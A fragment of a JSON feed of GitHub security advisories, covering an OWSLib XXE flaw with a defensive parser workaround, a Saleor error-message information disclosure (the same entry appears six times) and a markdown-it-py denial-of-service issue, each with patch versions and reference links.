            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>OWSLib's XML parser (which supports both <code>lxml</code> and <code>xml.etree</code>) does not disable entity resolution for <code>lxml</code>, and could lead to arbitrary file reads from an attacker-controlled XML payload. This affects all XML parsing in the codebase.</p>\n<h3 id=\"patches\">Patches</h3>\n<ul>\n<li>Use only lxml for XML handling, adding <code>resolve_entities=False</code> to <code>lxml</code>'s parser: <a href=\"https://github.com/geopython/OWSLib/pull/863\">https://github.com/geopython/OWSLib/pull/863</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<pre><code class=\"language-python\">patch_well_known_namespaces(etree)\netree.set_default_parser(\n    parser=etree.XMLParser(resolve_entities=False)\n)\n</code></pre>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://securitylab.github.com/advisories/GHSL-2022-131_OWSLib/\"><code>GHSL-2022-131</code></a></li>\n</ul>\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/geopython/OWSLib/security/advisories/GHSA-8h9c-r582-mggc\">https://github.com/geopython/OWSLib/security/advisories/GHSA-8h9c-r582-mggc</a></li>\n<li><a href=\"https://github.com/geopython/OWSLib/pull/863\">https://github.com/geopython/OWSLib/pull/863</a></li>\n<li><a href=\"https://github.com/geopython/OWSLib/releases/tag/0.28.1\">https://github.com/geopython/OWSLib/releases/tag/0.28.1</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27476\">https://nvd.nist.gov/vuln/detail/CVE-2023-27476</a></li>\n<li><a href=\"https://github.com/geopython/OWSLib/pull/863/commits/b92687702be9576c0681bb11cad21eb631b9122f\">https://github.com/geopython/OWSLib/pull/863/commits/b92687702be9576c0681bb11cad21eb631b9122f</a></li>\n<li><a href=\"https://securitylab.github.com/advisories/GHSL-2022-131_owslib/\">https://securitylab.github.com/advisories/GHSL-2022-131_owslib/</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-8h9c-r582-mggc\">https://github.com/advisories/GHSA-8h9c-r582-mggc</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-8h9c-r582-mggc",
            "title": "[OWSLib] OWSLib vulnerable to XML External Entity (XXE) Injection",
            "date_modified": "2023-03-20T14:00:07.000Z",
            "date_published": "2023-03-07T20:41:36.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-8h9c-r582-mggc"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like user email address in staff-authenticated requests.</p>\n<p>This issue has been patched in versions 3.1.48, 3.7.59, 3.8.30, 3.9.27, 3.10.14 and 3.11.12.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>None</p>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments about this advisory:</p>\n<ul>\n<li>Open a discussion at <a href=\"https://github.com/saleor/saleor/discussions\">https://github.com/saleor/saleor/discussions</a></li>\n<li>Email us at <a href=\"mailto:hello@saleor.io\">hello@saleor.io</a></li>\n</ul>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26051\">https://nvd.nist.gov/vuln/detail/CVE-2023-26051</a></li>\n<li><a href=\"https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1\">https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.1.48\">https://github.com/saleor/saleor/releases/tag/3.1.48</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.10.14\">https://github.com/saleor/saleor/releases/tag/3.10.14</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.11.12\">https://github.com/saleor/saleor/releases/tag/3.11.12</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.7.59\">https://github.com/saleor/saleor/releases/tag/3.7.59</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.8.30\">https://github.com/saleor/saleor/releases/tag/3.8.30</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.9.27\">https://github.com/saleor/saleor/releases/tag/3.9.27</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85",
            "title": "[Saleor] Saleor has Staff-Authenticated Error Message Information Disclosure Vulnerability via Python Exceptions",
            "date_modified": "2023-03-03T22:46:06.000Z",
            "date_published": "2023-03-03T22:46:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like user email address in staff-authenticated requests.</p>\n<p>This issue has been patched in versions 3.1.48, 3.7.59, 3.8.30, 3.9.27, 3.10.14 and 3.11.12.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>None</p>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments about this advisory:</p>\n<ul>\n<li>Open a discussion at <a href=\"https://github.com/saleor/saleor/discussions\">https://github.com/saleor/saleor/discussions</a></li>\n<li>Email us at <a href=\"mailto:hello@saleor.io\">hello@saleor.io</a></li>\n</ul>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26051\">https://nvd.nist.gov/vuln/detail/CVE-2023-26051</a></li>\n<li><a href=\"https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1\">https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.1.48\">https://github.com/saleor/saleor/releases/tag/3.1.48</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.10.14\">https://github.com/saleor/saleor/releases/tag/3.10.14</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.11.12\">https://github.com/saleor/saleor/releases/tag/3.11.12</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.7.59\">https://github.com/saleor/saleor/releases/tag/3.7.59</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.8.30\">https://github.com/saleor/saleor/releases/tag/3.8.30</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.9.27\">https://github.com/saleor/saleor/releases/tag/3.9.27</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85",
            "title": "[Saleor] Saleor has Staff-Authenticated Error Message Information Disclosure Vulnerability via Python Exceptions",
            "date_modified": "2023-03-03T22:46:06.000Z",
            "date_published": "2023-03-03T22:46:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like user email address in staff-authenticated requests.</p>\n<p>This issue has been patched in versions 3.1.48, 3.7.59, 3.8.30, 3.9.27, 3.10.14 and 3.11.12.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>None</p>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments about this advisory:</p>\n<ul>\n<li>Open a discussion at <a href=\"https://github.com/saleor/saleor/discussions\">https://github.com/saleor/saleor/discussions</a></li>\n<li>Email us at <a href=\"mailto:hello@saleor.io\">hello@saleor.io</a></li>\n</ul>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26051\">https://nvd.nist.gov/vuln/detail/CVE-2023-26051</a></li>\n<li><a href=\"https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1\">https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.1.48\">https://github.com/saleor/saleor/releases/tag/3.1.48</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.10.14\">https://github.com/saleor/saleor/releases/tag/3.10.14</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.11.12\">https://github.com/saleor/saleor/releases/tag/3.11.12</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.7.59\">https://github.com/saleor/saleor/releases/tag/3.7.59</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.8.30\">https://github.com/saleor/saleor/releases/tag/3.8.30</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.9.27\">https://github.com/saleor/saleor/releases/tag/3.9.27</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85",
            "title": "[Saleor] Saleor has Staff-Authenticated Error Message Information Disclosure Vulnerability via Python Exceptions",
            "date_modified": "2023-03-03T22:46:06.000Z",
            "date_published": "2023-03-03T22:46:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like user email address in staff-authenticated requests.</p>\n<p>This issue has been patched in versions 3.1.48, 3.7.59, 3.8.30, 3.9.27, 3.10.14 and 3.11.12.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>None</p>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments about this advisory:</p>\n<ul>\n<li>Open a discussion at <a href=\"https://github.com/saleor/saleor/discussions\">https://github.com/saleor/saleor/discussions</a></li>\n<li>Email us at <a href=\"mailto:hello@saleor.io\">hello@saleor.io</a></li>\n</ul>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26051\">https://nvd.nist.gov/vuln/detail/CVE-2023-26051</a></li>\n<li><a href=\"https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1\">https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.1.48\">https://github.com/saleor/saleor/releases/tag/3.1.48</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.10.14\">https://github.com/saleor/saleor/releases/tag/3.10.14</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.11.12\">https://github.com/saleor/saleor/releases/tag/3.11.12</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.7.59\">https://github.com/saleor/saleor/releases/tag/3.7.59</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.8.30\">https://github.com/saleor/saleor/releases/tag/3.8.30</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.9.27\">https://github.com/saleor/saleor/releases/tag/3.9.27</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85",
            "title": "[Saleor] Saleor has Staff-Authenticated Error Message Information Disclosure Vulnerability via Python Exceptions",
            "date_modified": "2023-03-03T22:46:06.000Z",
            "date_published": "2023-03-03T22:46:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like user email address in staff-authenticated requests.</p>\n<p>This issue has been patched in versions 3.1.48, 3.7.59, 3.8.30, 3.9.27, 3.10.14 and 3.11.12.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>None</p>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments about this advisory:</p>\n<ul>\n<li>Open a discussion at <a href=\"https://github.com/saleor/saleor/discussions\">https://github.com/saleor/saleor/discussions</a></li>\n<li>Email us at <a href=\"mailto:hello@saleor.io\">hello@saleor.io</a></li>\n</ul>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26051\">https://nvd.nist.gov/vuln/detail/CVE-2023-26051</a></li>\n<li><a href=\"https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1\">https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.1.48\">https://github.com/saleor/saleor/releases/tag/3.1.48</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.10.14\">https://github.com/saleor/saleor/releases/tag/3.10.14</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.11.12\">https://github.com/saleor/saleor/releases/tag/3.11.12</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.7.59\">https://github.com/saleor/saleor/releases/tag/3.7.59</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.8.30\">https://github.com/saleor/saleor/releases/tag/3.8.30</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.9.27\">https://github.com/saleor/saleor/releases/tag/3.9.27</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85",
            "title": "[Saleor] Saleor has Staff-Authenticated Error Message Information Disclosure Vulnerability via Python Exceptions",
            "date_modified": "2023-03-03T22:46:06.000Z",
            "date_published": "2023-03-03T22:46:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like user email address in staff-authenticated requests.</p>\n<p>This issue has been patched in versions 3.1.48, 3.7.59, 3.8.30, 3.9.27, 3.10.14 and 3.11.12.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>None</p>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments about this advisory:</p>\n<ul>\n<li>Open a discussion at <a href=\"https://github.com/saleor/saleor/discussions\">https://github.com/saleor/saleor/discussions</a></li>\n<li>Email us at <a href=\"mailto:hello@saleor.io\">hello@saleor.io</a></li>\n</ul>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/saleor/saleor/security/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26051\">https://nvd.nist.gov/vuln/detail/CVE-2023-26051</a></li>\n<li><a href=\"https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1\">https://github.com/saleor/saleor/commit/31bce881ccccf0d79a9b14ecb6ca3138d1edeec1</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.1.48\">https://github.com/saleor/saleor/releases/tag/3.1.48</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.10.14\">https://github.com/saleor/saleor/releases/tag/3.10.14</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.11.12\">https://github.com/saleor/saleor/releases/tag/3.11.12</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.7.59\">https://github.com/saleor/saleor/releases/tag/3.7.59</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.8.30\">https://github.com/saleor/saleor/releases/tag/3.8.30</a></li>\n<li><a href=\"https://github.com/saleor/saleor/releases/tag/3.9.27\">https://github.com/saleor/saleor/releases/tag/3.9.27</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r8qr-wwg3-2r85\">https://github.com/advisories/GHSA-r8qr-wwg3-2r85</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85",
            "title": "[Saleor] Saleor has Staff-Authenticated Error Message Information Disclosure Vulnerability via Python Exceptions",
            "date_modified": "2023-03-03T22:46:06.000Z",
            "date_published": "2023-03-03T22:46:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r8qr-wwg3-2r85"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Denial of service could be caused to markdown-it-py, before v2.2.0, if an attacker was allowed to force null assertions with specially crafted input.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-26303\">https://nvd.nist.gov/vuln/detail/CVE-2023-26303</a></li>\n<li><a href=\"https://github.com/executablebooks/markdown-it-py/commit/ae03c6107dfa18e648f6fdd1280f5b89092d5d49\">https://github.com/executablebooks/markdown-it-py/commit/ae03c6107dfa18e648f6fdd1280f5b89092d5d49</a></li>\n<li><a href=\"https://github.com/executablebooks/markdown-it-py/pull/246\">https://github.com/executablebooks/markdown-it-py/pull/246</a></li>\n<li><a href=\"https://github.com/executablebooks/markdown-it-py/commit/53ca3e9c2b9e9b295f6abf7f4ad2730a9b70f68c\">https://github.com/executablebooks/markdown-it-py/commit/53ca3e9c2b9e9b295f6abf7f4ad2730a9b70f68c</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-vrjv-mxr7-vjf8\">https://github.com/advisories/GHSA-vrjv-mxr7-vjf8</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-vrjv-mxr7-vjf8",
            "title": "[markdown-it-py] markdown-it-py Denial of Service vulnerability",
            "date_modified": "2023-03-03T23:17:36.000Z",
            "date_published": "2023-02-23T00:30:39.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-vrjv-mxr7-vjf8"
            },
            "tags": [
                "severity"
            ]
        }
    ]
}